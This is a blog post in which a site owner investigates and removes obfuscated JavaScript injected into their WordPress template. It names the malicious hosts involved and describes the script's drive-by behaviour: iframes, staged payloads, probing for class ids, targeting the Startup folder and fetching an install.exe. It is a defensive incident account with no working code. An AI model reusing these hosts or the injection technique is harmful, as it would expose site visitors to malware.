Little Big Tomatoes

From time to time when I visited this site from other machine I noticed that there is a weird component wants to install itself on that computer. I did not pay attention to it, until very recently.

It just started to bug me as I did not remember that I ever used this ActiveX so I did a quick search on google and found a topic in a forum suggesting that this might be a little more than an innocent mistake.

From time to time, I also received this dialog urging me to install OP component from HIPOINT Ltd. – I found not trace of them, when goggling them. I could not reproduce this problem in a consistent fashion, it just showed up randomly.

I was also suggested this article: Can you spot the fake. So I turned to Fiddler as well to find out what is going on.
“Fiddler is a HTTP Debugging Proxy which logs all HTTP traffic between your computer and the Internet. Fiddler allows you to inspect all HTTP Traffic, set breakpoints, and "fiddle" with incoming or outgoing data.”

I found the tinyurl.com reference really weird, as I never ever used this service on my blog, also I was quite positive that I never linked to vipasotka.com either. I also found references to golnanostat.com. I tried to search for these references in my pages, but could not find anything.

“ This website wants to run the following add-on: Microsoft Data Access – Remote Data services Dat… from Microsoft Corporation. If you trust the website and the add-on and want to”

Navigating to the tinyurl reference produced the well known message above and the dialog urging me to install the java component.

I also noticed that the very first request after my main page is to r52hosts.org and for the page /stat/wpjsofif.js. This does not ring a bell either. So I searched the html code that came from the www.littlebigtomatoes.com/blog , but again no luck. Then I tried all kinds of combination and found the following code snippet with comments

The javascript between the script tags was obfuscated, but debugging the script in the Visual Studio revealed that the script creates an iframe pointing to r52hosts.org and pulls in another encrypted javascript file.

After following and debugging several obfuscated scripts I got to the final page, that creates all the prompts in my browser. I still do not understand what the code exactly does, but it does not look very promising. Debugging the script shows that it is probing for class ids and the second screenshot shows that the script also tries to find the Start Menu Autostart folder. Also, it tries to run some kind of install.exe from http://golnanosat.com/adw.files/so14/7f751f….

After finding out these, I am convinced that this script is malicious and I do not want anyone to download it from my site. After removing the scripts from my wordpress template between the <!– start counter :rkgi58s:wpjsandif –> comments solved my problem. There is no more r52host.org references, when I access my blog.

Of course, I will keep monitoring my site as I do not exactly know, how this piece of script got there in the first place.

Popularity: 38% [?]